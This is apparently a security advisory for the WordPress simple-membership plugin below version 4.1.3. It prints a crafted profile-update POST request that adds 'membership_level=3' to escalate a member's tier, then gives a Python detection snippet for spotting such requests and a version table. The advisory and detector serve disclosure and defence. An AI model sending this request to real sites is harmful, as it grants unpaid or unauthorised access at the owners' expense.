The plugin does not properly validate the `membership_level` parameter when editing a profile, allowing members to escalate to a higher membership level by using a crafted POST request. Note: This only affects membership from the plugin, not the WordPress role.
To increase the level, the attacker needs to add the `membership_level` parameter to the POST request sent when updating the profile.

```
POST /membership-login/membership-profile/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: [logged in user with membership level 2]

swpm_profile_edit_nonce_val=1c449c7f1a&_wp_http_referer=%2Fmembership-login%2Fmembership-profile%2F&email=user%40localhost.localhost&password=&password_re=&first_name=user_low&last_name=user_low&phone=&address_street=123&address_city=1234&address_state=123&address_zipcode=&country=&company_name=&swpm_editprofile_submit=Update&action=custom_posts&membership_level=3
```
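For defenders reviewing request logs or writing a WAF rule, here is an added detection example (not part of the advisory and not the plugin's code) that flags profile-update POSTs carrying `membership_level` or any other field the form does not send. It assumes the fields in the request above are the complete set the profile form submits; `php_name` and `inspect_profile_post` are hypothetical names.

```python
from urllib.parse import parse_qsl

# Path and field names come from the request shown in the advisory.
PROFILE_PATH = "/membership-login/membership-profile/"
# Assumption: the fields in the sample request are the full set the form sends.
EXPECTED_FIELDS = {
    "swpm_profile_edit_nonce_val", "_wp_http_referer", "email", "password",
    "password_re", "first_name", "last_name", "phone", "address_street",
    "address_city", "address_state", "address_zipcode", "country",
    "company_name", "swpm_editprofile_submit", "action",
}
PRIVILEGED_FIELDS = {"membership_level"}


def php_name(raw):
    """Approximate the name PHP gives a request variable before the plugin sees it."""
    # PHP drops leading spaces, turns '.' and ' ' into '_', and folds a[b] into a.
    name = raw.lstrip(" ").split("[", 1)[0]
    return name.replace(".", "_").replace(" ", "_")


def inspect_profile_post(method, path, body):
    """Return (kind, raw_name, value) findings for one request; [] if clean."""
    if method.upper() != "POST" or path.split("?", 1)[0] != PROFILE_PATH:
        return []
    findings = []
    # parse_qsl percent-decodes names, so matching is done on the decoded form.
    for raw, value in parse_qsl(body, keep_blank_values=True):
        name = php_name(raw)
        if name in PRIVILEGED_FIELDS:
            findings.append(("privileged-field", raw, value))
        elif name not in EXPECTED_FIELDS:
            findings.append(("unexpected-field", raw, value))
    return findings


# Constructed sample bodies (not captured traffic); the nonce is a placeholder.
CLEAN = (
    "swpm_profile_edit_nonce_val=0000000000"
    "&email=user%40localhost.localhost&password=&first_name=user_low"
    "&swpm_editprofile_submit=Update&action=custom_posts"
)
TAMPERED = CLEAN + "&membership_level=3"

if __name__ == "__main__":
    for label, body in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, inspect_profile_post("POST", PROFILE_PATH, body))
```

Detection of this kind is a stopgap for sites that cannot update yet; the fix itself is the patched plugin version listed below.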

CPE

Name | Operator | Version |
---|---|---|
simple-membership | lt | 4.1.3 |